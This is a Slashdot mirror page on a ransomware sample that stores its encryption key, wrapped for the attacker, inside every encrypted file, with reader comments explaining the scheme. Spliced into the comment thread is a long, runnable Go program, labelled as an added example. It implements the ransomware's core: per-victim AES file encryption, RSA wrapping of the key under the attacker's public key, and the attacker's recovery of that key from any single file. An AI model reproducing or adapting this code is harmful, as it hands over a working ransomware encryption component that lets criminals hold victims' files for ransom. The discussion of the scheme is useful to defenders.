Slashdot Mirror


Crypto-Ransomware Encrypts Files "Offline"

An anonymous reader writes: Ransomware comes in various forms, and not all ransomware encrypts files — some just block computers until the ransom is paid. When the file encryption feature is included, the encryption key is usually sent to the malware's C&C server, which is controlled by the crooks — but not always. Researchers have recently analyzed a crypto-ransomware sample that demonstrated an alternative method of encrypting files and delivering the key (i.e., the information required to discover the right key) to the criminal behind the scheme — it doesn't need to contact a C&C to receive an encryption key or to send it to the crook.

4 of 54 comments

  1. Stupid summary by Kjella · Score: 4, Insightful

    So instead of the malware actively sending the key, the victim has to send one of the encrypted files instead, big whoop. The method is the same, encrypt your files and put the key in a message encrypted for the malware author. Who does the sending is a technicality.

    --
    Live today, because you never know what tomorrow brings
  2. Transmission of the Key by Coren22 · Score: 5, Informative

    So, to save others having to click the link, the method of the key transmission is like this:

    The first part of every file contains the key encrypted with the ransomer's private key; the victim needs to send at least one file to the ransomer, who then uses it to extract the key and send it back to the victim.

    The ransomware also has some odd features, from TFA:

    Once downloaded and run on the machine, the ransomware encrypts all personal files and renames them. The new names follow the following format: email-[address to contact].ver-[Ransomware internal version].id-[Machine identifier]-[Date & Time][Random digits].randomname-[Random name given to the encrypted file].cbf (example: email-Seven_Legion2@aol.com.ver-CL 1.0.0.0.id-NPEULAODSHUJYMAPESHVKYNBQETHWKZOBQFT-10@6@2015 9@53@19AM5109895.randomname-EFWMERGVKYNBPETHVKZNBQETHWKZNB.RGV.cbf).

    The researcher also recommends paying up, as there does not appear to be any way around this one.

    --
    APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
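The scheme the comment above describes, as an added example in Go (not the analysed sample's code, and not from the article): the malware carries only the attacker's public key, draws one random file key per victim, wraps that key with RSA-OAEP under the public key, and prepends the wrapped copy to every encrypted file. Sending the attacker any single file is enough for them to unwrap the key with the private key they kept, and that key then opens every file. The header layout (`CBF1` magic, two-byte length, wrapped key, GCM nonce, ciphertext) and the choice of AES-256-GCM for the file body are assumptions made for this example; the sample's real format is not documented on this page.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Assumed header layout for this example (not the real sample's format):
//   magic(4) | wrappedLen(2, big-endian) | wrapped file key | nonce(12) | AES-GCM ciphertext
var magic = []byte("CBF1")

const nonceSize = 12 // standard GCM nonce length

// VictimSession holds the single per-victim file key and its RSA-wrapped
// copy; the same wrapped blob goes into the header of every file.
type VictimSession struct {
	fileKey []byte
	wrapped []byte
}

// NewVictimSession is the malware-side setup: a random AES-256 key, wrapped
// with RSA-OAEP under the attacker's public key. No C&C contact is needed
// because the public key ships inside the malware.
func NewVictimSession(attackerPub *rsa.PublicKey) (*VictimSession, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, attackerPub, key, nil)
	if err != nil {
		return nil, err
	}
	return &VictimSession{fileKey: key, wrapped: wrapped}, nil
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptFile encrypts one file body and prepends the header carrying the
// wrapped key, so any file on disk is enough to recover the key later.
func (s *VictimSession) EncryptFile(plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(s.fileKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	var out bytes.Buffer
	out.Write(magic)
	var lenBuf [2]byte
	binary.BigEndian.PutUint16(lenBuf[:], uint16(len(s.wrapped)))
	out.Write(lenBuf[:])
	out.Write(s.wrapped)
	out.Write(nonce)
	out.Write(gcm.Seal(nil, nonce, plaintext, magic)) // magic bound as AAD
	return out.Bytes(), nil
}

// parseHeader splits an encrypted file into wrapped key, nonce and ciphertext.
func parseHeader(blob []byte) (wrapped, nonce, ct []byte, err error) {
	if len(blob) < len(magic)+2 || !bytes.Equal(blob[:len(magic)], magic) {
		return nil, nil, nil, errors.New("not an encrypted file")
	}
	n := int(binary.BigEndian.Uint16(blob[len(magic):]))
	off := len(magic) + 2
	if len(blob) < off+n+nonceSize {
		return nil, nil, nil, errors.New("truncated header")
	}
	return blob[off : off+n], blob[off+n : off+n+nonceSize], blob[off+n+nonceSize:], nil
}

// RecoverFileKey is the attacker side: from any one file the victim sends,
// unwrap the per-victim key with the private key that never left the attacker.
func RecoverFileKey(attackerPriv *rsa.PrivateKey, blob []byte) ([]byte, error) {
	wrapped, _, _, err := parseHeader(blob)
	if err != nil {
		return nil, err
	}
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, attackerPriv, wrapped, nil)
}

// DecryptFile is what the victim can do once the attacker returns the key;
// a wrong key fails GCM authentication instead of yielding garbage.
func DecryptFile(fileKey, blob []byte) ([]byte, error) {
	_, nonce, ct, err := parseHeader(blob)
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, nonce, ct, magic)
}

func main() {
	attacker, _ := rsa.GenerateKey(rand.Reader, 2048) // stays with the attacker
	sess, _ := NewVictimSession(&attacker.PublicKey)
	f1, _ := sess.EncryptFile([]byte("quarterly report"))
	f2, _ := sess.EncryptFile([]byte("family photos index"))
	key, _ := RecoverFileKey(attacker, f1) // one file is enough
	p2, _ := DecryptFile(key, f2)          // ... and it opens every file
	fmt.Printf("recovered from a different file: %q\n", p2)
}
```

The point for defenders is in `RecoverFileKey`: nothing in the infected machine's memory or network traffic is needed, the victim's own uploaded file carries the wrapped key, so there is no C&C channel to sinkhole and no key to capture in transit. Without the attacker's private key, the only recovery path is the one the reply below gives: restore from backup.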
    1. Re:Transmission of the Key by Anonymous Coward · Score: 2, Insightful

      The correct reaction however is to treat it like you accidentally wiped the disk: Restore from backup or, if you don't have a backup, learn your lesson and start making backups. Giving in to extortion just breeds more extortion.

  3. Dang... by truck_soccer · Score: 2

    So they were able to contact the author of the malware, but are unable to find him and bring him to justice?